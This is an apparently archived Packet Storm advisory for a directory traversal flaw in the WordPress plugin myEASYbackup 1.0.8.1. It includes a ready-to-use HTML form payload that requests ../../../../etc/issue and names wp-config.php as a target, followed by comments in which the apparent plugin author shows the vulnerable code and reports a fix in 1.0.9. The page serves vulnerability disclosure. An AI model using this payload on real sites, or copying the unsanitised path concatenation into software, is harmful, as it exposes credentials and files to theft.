WordPress plugin myEASYbackup version 1.0.8.1 suffers from a directory traversal vulnerability that allows for arbitrary file downloads.
7f54135b82974ba6a5ce5cfc44d7dac3wordpress plugin myEASYbackup 1.0.8.1 arbitrary file download
http://wordpress.org/extend/plugins/myeasybackup/
parameter "dwn_file" (post)
script "meb_download.php"
you can get wp-config.php or whatever (using advanced directory traversal
technology)!
<form method="post" action="http://CENSORED/wp-content/plugins/myeasybackup/meb_download.php">
<input type="text" name="dwn_file" value="../../../../../../../../etc/issue">
<input type="submit">
</form>
author: antiphastrophus
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments (2)
Hi,
"meb_download.php" adds the backup path defined by the user in the settings:
$file = MEBAK_BACKUP_PATH . '/' . $_POST['dwn_file'];
I tough that doing this was sufficient but I was wrong did not considering the "../../" trick :(
I can easily release a new version that "calculates" the path of the file name to download as follows:
$file_name = MEBAK_BACKUP_PATH . '/' . basename($_POST['dwn_file']);
Do you think its enough safe?
thanks,
Camaleo
2012-01-17 11:01:48 UTC | Permalink | Reply
fixed starting from version 1.0.9, now available for downloads, thanks for letting me know.
2012-01-19 07:24:14 UTC | Permalink | Reply